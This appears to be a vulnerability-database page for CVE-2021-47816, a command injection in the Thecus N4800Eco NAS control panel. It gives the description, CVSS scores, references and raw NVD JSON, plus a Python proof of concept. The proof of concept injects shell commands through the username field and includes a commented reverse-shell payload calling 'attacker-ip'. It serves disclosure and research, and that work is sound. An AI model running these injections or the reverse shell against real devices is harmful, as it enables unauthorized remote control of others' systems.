CVE-2021-47816

Description

Thecus N4800Eco NAS Server Control Panel contains a command injection vulnerability that allows authenticated attackers to execute arbitrary system commands through user management endpoints. Attackers can inject commands via username and batch user creation parameters to execute shell commands with administrative privileges.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Thecus N4800Eco NAS Server Control Panel (all versions)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # CVE-2021-47816 Thecus N4800Eco NAS Command Injection PoC # Target: Thecus N4800Eco NAS Server Control Panel # Vulnerability: Command Injection in user management target = "http://target-ip" username = "admin" password = "admin" # Authentication session = requests.Session() login_data = {"username": username, "password": password} login_url = f"{target}/login" session.post(login_url, data=login_data) # Command Injection via username parameter # Inject: ping -c 4 10.10.10.10 (DNS lookup for OOB testing) injected_username = "; ping -c 4 10.10.10.10; #" user_creation_url = f"{target}/api/user/add" payload = { "username": injected_username, "password": "test123", "email": "[email protected]" } response = session.post(user_creation_url, data=payload) print(f"Status: {response.status_code}") print(f"Response: {response.text}") # Reverse shell payload example: # username = "; bash -i >& /dev/tcp/attacker-ip/4444 0>&1; #"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47816
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47816
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47816/
[4] VulDB https://vuldb.com/cve/CVE-2021-47816
[5] http://www.thecus.com/
[6] http://www.thecus.com/product.php?PROD_ID=83
[7] https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection
[8] https://www.exploit-db.com/exploits/49926
[9] https://www.vulncheck.com/advisories/thecus-neco-nas-server-control-panel-command-injection

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47816", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:06.197", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Thecus N4800Eco NAS Server Control Panel contains a command injection vulnerability that allows authenticated attackers to execute arbitrary system commands through user management endpoints. Attackers can inject commands via username and batch user creation parameters to execute shell commands with administrative privileges."}, {"lang": "es", "value": "El Panel de Control del Servidor NAS Thecus N4800Eco contiene una vulnerabilidad de inyección de comandos que permite a atacantes autenticados ejecutar comandos de sistema arbitrarios a través de puntos finales de gestión de usuarios. Los atacantes pueden inyectar comandos a través de los parámetros de nombre de usuario y creación de usuarios por lotes para ejecutar comandos de shell con privilegios administrativos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "http://www.thecus.com/", "source": "[email protected]"}, {"url": "http://www.thecus.com/product.php?PROD_ID=83", "source": "[email protected]"}, {"url": "https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49926", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/thecus-neco-nas-server-control-panel-command-injection", "source": "[email protected]"}]}}